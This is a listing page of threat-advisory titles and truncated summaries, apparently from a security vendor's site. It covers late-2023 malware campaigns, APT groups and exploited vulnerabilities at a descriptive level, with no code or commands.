1589 matches found
Chinese APT Masquerading as Cloud Services in Cambodia
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary Chinese APT targets Cambodian government via disguised cloud services, aiming to access sensitive data, aligning with Chinas regional interests. Actors adapt work hours, signaling Chinese origin, urging...
Millenium RAT the $30 Access Ticket to Data Theft
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary The Millenium RAT, a Win32 executable built on .NET, specifically version 2.4, is available on GitHub for a one-time fee of $30, granting lifetime access. Notably, this RAT is actively developed and has...
SideCopy Leverages Multi-platform RAT, Assaults Indian Government Entities
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary A threat actor linked to Pakistan named SideCopy is capitalizing on WinRARs CVE-2023-38831 vulnerability to target Indian government agencies. This security vulnerability facilitates distribution of...
BlueNoroff Unleashes New macOS Malware ObjCShellz
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary A new macOS malware variant linked to the financially motivated BlueNoroff APT group, named "ObjCShellz,“ featuring remote shell capabilities and suspicious domain communication. The malware, written in...
Iran-Backed Agrius APT’s Attacks on Israeli Institutions
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary In a series of harmful cyberattacks that occurred from January 2023 to October 2023, the Iranian-backed Advanced Persistent Threat APT group known as Agrius targeted Israels education and technology...
Jupyter Infostealer Returns with New Addition to Its Arsenal
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary Jupyter Infostealer is a malware variant initially discovered in late 2020. Since then, it has undergone continued evolution, altering its delivery methods and techniques to avoid detection and establish...
Kinsing Exploits Looney Tunables Vulnerability to Breach Cloud Environments
Threat Level Actor Report For a detailed threat advisory, download the pdf file here Summary The threat actor Kinsing has recently been observed exploiting the Linux privilege escalation vulnerability known as "Looney Tunables CVE-2023-4911" as part of a new campaign aimed at breaching cloud...
Attacks, Vulnerabilities and Actors 30 October to 5 November 2023
For a detailed threat digest, download the pdf file here Summary HiveForce Labs has recently made several significant discoveries related to cybersecurity threats. Over the past week, we identified a total of six executed attacks, three instances of adversary activity, and one exploited...
Socks5Systemz Proxy Botnet Infects 10,000 Systems
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary A sophisticated proxy botnet known as Socks5Systemz has insidiously infiltrated over 10,000 computers by employing the PrivateLoader and Amadey malware loaders. The masterminds behind this botnet offer...
MuddyWater Returns with a New Spear-Phishing Campaign
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary MuddyWater, the Iranian nation-state actor, has been identified in a new spearphishing campaign targeting two Israeli entities and deploying a legitimate remote administration tool known as N-able Advanc...
Ransomware Threats Exploit CVE-2023-46604 in Apache ActiveMQ Servers
Threat Level Vulnerability Report For a detailed threat advisory, download the pdf file here Summary Ransomware groups and SparkRAT exploiting a critical vulnerability CVE-2023-46604 in Apache ActiveMQ, despite a security update on October 27, 2023, affecting systems with outdated ActiveMQ...
Scarred Manticore’s Middle Eastern Gambit
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary Scarred Manticore, an actor associated with Irans Ministry of Intelligence and Security MOIS, has been conducting a highly sophisticated cyber espionage campaign with a strong focus on the Middle East...
Summary of Vulnerabilities, Actors & Attacks: October 2023
...
CISA Known Exploited Vulnerability Catalog October 2023
For a detailed CISAs KEV Catalog, download the pdf file here Summary The Known Exploited Vulnerability KEV catalog, maintained by CISA, is the authoritative source of vulnerabilities that have been exploited in the wild. It is recommended that all organizations review and monitor the KEV catalog,...
Atlassian’s Latest Critical Confluence Flaw Poses Risk of Data Loss
Threat Level Vulnerability Report For a detailed threat advisory, download the pdf file here Summary A critical vulnerability identified in Atlassian as CVE-2023-22518 which pertains to be an improper authorization issue in Confluence Data Center and Server. If successfully exploited by an...
Hackers Utilize MSIX App Packages to Disseminate GHOSTPULSE Malware
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary A new cyber attack campaign has emerged, involving the use of fake MSIX Windows app packages masquerading as legitimate applications. These deceptive MSIX packages are employed to distribute a new malwar...
From Bullets to Bytes The Hamas-Israel Conflict Goes Digital
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary In the midst of the ongoing Israeli-Hamas conflict, a group of pro-Hamas hacktivists has emerged, utilizing a sophisticated Linux-based wiper malware known as BiBi-Linux Wiper. In the broader context of...
Stop Putting Out Fires Its Time to Change Vulnerability Management For the Better
In this video, Anand Choudha, CEO at Hive Pro, and Jeelan Poola, CPO at Hive Pro, introduce the HivePro Uni5 Threat Exposure Management Platform. HivePro Uni...
Celebrity Vulnerability Report | Navigating Challenges with HivePro Uni5
In this video, Anand Choudha, CEO at Hive Pro, and Jeelan Poola, CPO at Hive Pro, introduce the HivePro Uni5 Threat Exposure Management Platform. HivePro Uni...
Attacks, Vulnerabilities and Actors 23 October to 29 October 2023
For a detailed threat digest, download the pdf file here Summary HiveForce Labs has recently made several significant discoveries related to cybersecurity threats. Over the past week, we identified a total of seven executed attacks, two instances of adversary activity, and three exploited...
Lazarus Unleash SIGNBT Malware in Latest Campaign
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary The Lazarus Group has been identified as the mastermind behind a recent cyber campaign. They persistently targeted a software vendor, successfully compromising the vendors systems by exploiting software...
Redefining the StripedFly Malware Framework
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary An intricate cross-platform malware framework, known as StripedFly, operated discreetly for five years, surreptitiously compromising over a million Windows and Linux systems. It skillfully evaded in-dept...
Vmware vCenter Flaws Leading to RCE Attacks
Threat Level Vulnerability Report For a detailed threat advisory, download the pdf file here Summary Two vulnerabilities, CVE-2023-34048 and CVE-2023-34056, were identified in VMware vCenter Server, a server management software used for centralized management of virtual machines and ESXi hosts...
Winter Vivern Capitalizes on Zero-Day Flaw in Roundcube
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary The Winter Vivern cyberespionage group has been actively exploiting a zero-day vulnerability in the Roundcube webmail. The identified vulnerability, CVE-2023-5631, permits stored cross-site scripting...
YoroTrooper Covert Cyber Espionage Masters of Kazakhstan
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary YoroTrooper, a stealthy threat actor primarily focused on espionage, first emerged in June 2022. YoroTroopers targets appear to be concentrated within the Commonwealth of Independent States CIS nations,...
Attackers Exploit Brazil’s PIX System with GoPIX Malware Campaign
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary The popularity of Brazils PIX payment system has attracted cybercriminals using GoPIX malware, targeting users searching for "WhatsApp web" with malicious ads. This poses a threat to users financial and...
Attackers Exploit VMware’s Aria Operations for Logs Vulnerability
Threat Level Vulnerability Report For a detailed threat advisory, download the pdf file here Summary A critical authentication bypass vulnerability CVE-2023-34051 in VMware Aria Operations for Logs allows remote code execution with root privileges under certain conditions, raising concerns for...
ExelaStealer A New Entrant in the InfoStealer Landscape
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary ExelaStealer is a newly discovered InfoStealer malware that emerged in August 2023. Its distinctive feature lies in being an open-source tool, customizable for a fee. Primarily coded in Python,...
Hackers Infiltrate Russian Government and Industrial Entities
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary Numerous governmental and pivotal industrial entities in Russia fell victim to a sophisticated Go-based custom backdoor. This malicious software was specifically crafted for data theft, suggesting its...
Quasar RAT Utilizes DLL Side-Loading to Evade Detection
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary Quasar RAT is an open-source remote access trojan that has been used by cybercriminals and threat actors for various malicious purposes. The use of DLL side-loading is a sophisticated technique that allo...
Attacks, Vulnerabilities and Actors 16 October to 22 October 2023
For a detailed threat digest, download the pdf file here Summary HiveForce Labs recently made several significant discoveries related to cybersecurity threats. Over the past week, a total of twenty-three attacks were executed, ten vulnerabilities were discovered, and five active adversaries were...
Mastering Threat Exposure with Uni5 Xposure
...
BlackCat Incorporates ‘Munchkin’ into Its Arsenal
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary The BlackCat ransomware group has introduced a new tool called Munchkin in its operations. This tool employs virtual machines VMs to stealthily deploy encryptors on network devices. Munchkin allows the...
Prolonged Pursuit of OilRig APT Targeting Middle East Government
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary The Iran-affiliated threat actor known as OilRig orchestrated a sophisticated eight-month campaign directed at the Middle East government, during which the attackers managed to steal sensitive files and...
MATA Backdoor Targets Eastern European Industrial Companies
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary MATA malware, a sophisticated backdoor framework, updated to target Eastern European industrial companies via spear-phishing, compromising financial software servers, and infiltrating networks, even...
In-Depth Analysis of Phobos Ransomware
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary Phobos ransomware, active since 2018, primarily targets small to medium-sized businesses with lower ransom demands. It uses compromised RDP connections, is distributed via a Ransomware as a Service model...
North Korean Actors Behind Active Exploitation of TeamCity Vulnerability
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary The North Korean threat actors Lazarus and its subgroup Andariel are actively exploiting the CVE-2023-42793 vulnerability, which is an authentication bypass vulnerability, after successful exploitation, ...
A Longstanding Zero-Day in Citrix Devices Exploited Since August
Threat Level Vulnerability Report For a detailed threat advisory, download the pdf file here Summary A zero-day exploit, identified as CVE-2023-4966, has been actively targeting critical vulnerabilities in Citrix NetScaler ADC/Gateway devices since late August 2023. This exploit has the potential...
Kimsuky Unveils New Addition to Its Malware Arsenal
Threat Level Actor Report For a detailed threat advisory, download the pdf file here Summary Kimsuky, a cyber-espionage group, is known for infiltrating via spear-phishing attacks, and is recognized for its versatility in using various types of malware and tools to facilitate remote control durin...
Multiple State-Sponsored Groups Exploit WinRAR Vulnerability in Phishing Attacks
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary A series of phishing attacks linked to a Russian state-sponsored group, leveraging a WinRAR vulnerability to steal data, including browser credentials via PowerShell commands and exfiltrating it through ...
BbyStealer’s Tactic for Targeting VPN Users
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary The BbyStealer malware resurfaces and orchestrates a sophisticated information-theft campaign, utilizing numerous phishing domains to target users of VPN applications engaged in downloading activities,...
Unpatched Zero-Day Vulnerability Actively Exploited in Cisco IOS XE
Threat Level Vulnerability Report For a detailed threat advisory, download the pdf file here Summary The critical, unpatched security vulnerability identified as CVE-2023-20198 affects Cisco IOS XE software. Cisco IOS XE is a network operating system used in Cisco network devices. The identified...
Lazarus Group’s Targeted Attacks on Korean Sectors
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary The Lazarus a state-sponsored threat group, has been employing sophisticated tactics like spear phishing and supply chain attacks, and utilizing various types of malware for control. To receive real-time...
A New XorDDoS Linux Trojan That Launches Powerful DDoS Attacks
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary The XorDDoS Trojan, a Linux-based malware, orchestrates DDoS attacks through infected devices, with a recent campaign detected in 2023. Attackers employ scanning, persistence, and C2 infrastructure...
Storm-0978 unleashes PEAPOD to target Women Political Leaders
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary Storm-0978, a threat actor group, utilized a new variant of the RomCom backdoor, "ROMCOM 4.0" also referred to as PEAPOD, to target attendees of the Women Political Leaders WPL Summit in Brussels. This...
Attacks, Vulnerabilities and Actors 9 October to 15 October 2023
For a detailed threat digest, download the pdf file here Summary HiveForce Labs has recently made several significant discoveries related to cybersecurity threats. Over the past week, we identified a total of twenty executed attacks, two instance of adversary activity, and fourteen vulnerabilitie...
SeroXen RAT Leverages NuGet Packages
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary Several malicious packages have been detected in NuGet, a widely used package manager for the .NET Framework. These packages utilized typosquatting methods to masquerade as legitimate ones and were...
Revealing DarkGate’s Incursion Across Continents
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary A potential threat actor has been using compromised Skype and Microsoft Teams accounts to distribute DarkGate, a problematic loader campaign primarily targeting the Americas region. To receive real-time...
ShellBot Malware Evades Detection Using Hexadecimal IP Addresses
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary ShellBot malware, targeting poorly managed Linux SSH servers, now employs hexadecimal IP addresses in its download URLs to evade detection. This change highlights the need for strong security measures an...
In-Depth Analysis of AvosLocker Ransomware
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary AvosLocker also known as Avos, is a ransomware-as-a-service that targets critical infrastructure organizations, primarily in the US, and has expanded to target both Windows and Linux systems. Its...